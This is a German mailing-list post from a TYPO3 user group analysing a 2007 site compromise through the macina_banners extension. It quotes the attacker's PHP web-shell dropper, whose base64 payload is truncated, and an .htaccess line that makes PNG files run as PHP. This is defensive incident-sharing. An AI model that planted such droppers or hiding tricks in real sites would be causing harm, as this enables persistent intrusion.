[TYPO3-UG Rhein-Neckar] Typo3 Hack

Oliver Troch typo3 at meinverein24.de
Mon Jul 16 07:49:46 CEST 2007


Hallo Ralf,

hier eine Mail eines anderen betroffenen, der die Sache etwas 
einschränken kann. Ich werde nicht drumherum kommen, alle Accounts neu 
aufzusetzen. Daher hoffe ich, dass die neueste Version sicher ist. 
Welche könnt ihr denn empfehlen. Gruß Oliver

Hallo Oliver,


wir haben es jetzt soweit auf die Reihe bekommen. Der Ursache war
macina_banners und dort hat er sich Zugriff auf einen Admin User
verschafft und zwar 3 Tage bevor der Exploit bekannt geworden ist.

Mit dem Admin Zugang hat er dann im Endeffekt die Macht gehabt. Er hat
die besagten iframe Umleitungen gemacht oder manchmal auch
document.write oder was auch immer. Dieser Schadcode war in sehr
unterschiedlichen Stellen zu finden. Angehängt an die Titel der pages,
eingefügt in localconf.php (sehr genial) oder in eine javascript datei
im typo3temp-Folder. - Das war nur der Schadcode.


Dann die Shells. Die hat er im Regelfall mit seinem Admin-Zugang in
Typo3 erstellt, indem er ein php-content element eingefügt hat:
$d=base64_decode(\"PD9waHANCiR2ZXJzaW9uID0gIjAuOCI7DQokdnNwbGl0ID0gInN0eWxlPVwiYm9yZGVyLXJpZ2h0OiAjMDAwMDAwIDFweCBzb2x
pZDtcIiI7DQokaHNwbGl0ID0gInN0eWxlPVwiYm9yZGVyLWJvdHRvbTogIzAwMDAwMCAxcHggc29saWQ7XCIiOw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KDQp
pZih2ZXJzaW9uX2NvbXBhcmUo [...]
$f = fopen(\"/var/www/web32/html/typo3temp/cache.php\",\"w\");
fwrite($f,$d);
fclose($f);
[..]

Die Shell selbst verfügen teilweise über einen
Selbstzerstörungsmechnismus. Wenn die Browser ID nicht übereinstimmt =
unlink shell (sehr nett). Wo versteckt er die shells. Entweder recht
easy als temp.php im typo3temp Verzeichnis oder (jetzt wirds genial) er
erweitert die .htaccess um:
AddType application/x-httpd-php .png
  ~
Und dann liegt die Shell in einer "png Datei" in typo3temp/GB/


Okay, jetzt die Frage, wie highjackt er andere Accounts? - Das ist so
peinlich für uns, weil wir suPHP einsetzen, aber (shame on us) mod_php
nicht komplett deaktiviert haben. Seine shells laufen mit mod_php und
daher kann er auf das normale system Befehls Repartoire zugreifen.

Für uns war es jetzt easy, weil wir einfach nur mod_php komplett
rausgeschmissen haben. Aber soweit ich weiß, setzen die meisten Leute
kein suPHP ein. Die haben definitiv ein Problem!



Was uns jetzt beim 2. hack noch aufgefallen ist und wir gerade ergründen
ist, inwieweit man sich auf den 3.X Typo3 Systemen mit Username und md5
passwort (nicht klartext) einloggen kann. So hat er sich nämlich
eingeloggt. <- Bleibt zu klären.

Ich hoffe, wir konnten dir ein bißl weiterhelfen. Wir werden morgen wohl
die Logs dazu sortieren und ich werden dann meine Rechtschreibung
verbessern.

Gruß
Lars

Ralf Hettinger schrieb:
> Hallo Oliver,
> 
>> Ich dachte diesen weißen Bildschirm hätte schon mal jemand gehabt.
> 
> Auf einem korrumpierten System Symptome zu beheben macht meiner Meinung nach
> wenig Sinn.
> 
> 
> Oliver Troch schrieb:
>> vielen Dank für den Tipp. Jedoch macht das wenig Sinn, wenn selbst das
>> Typo3 Secuirty Team noch nicht weiß, wo die Hacker reinkommen. 
> 
> Kommen sie denn über TYPO3?
> 
> 
>>>> nachdem nun die Hacker die Datenbankpasswörter auslesen können und den
>>>> Login bzw. die Datei install.php im Verzeichnis localconf beherrschen
> 
> Diese Angaben sind wohl so eher wenig aussagekräftig... meinst Du typo3conf und
> localconf.php? Und was heißt "beherrschen"?
> 
> 
> Gruß Ralf


More information about the TYPO3-UG-rhein-neckar mailing list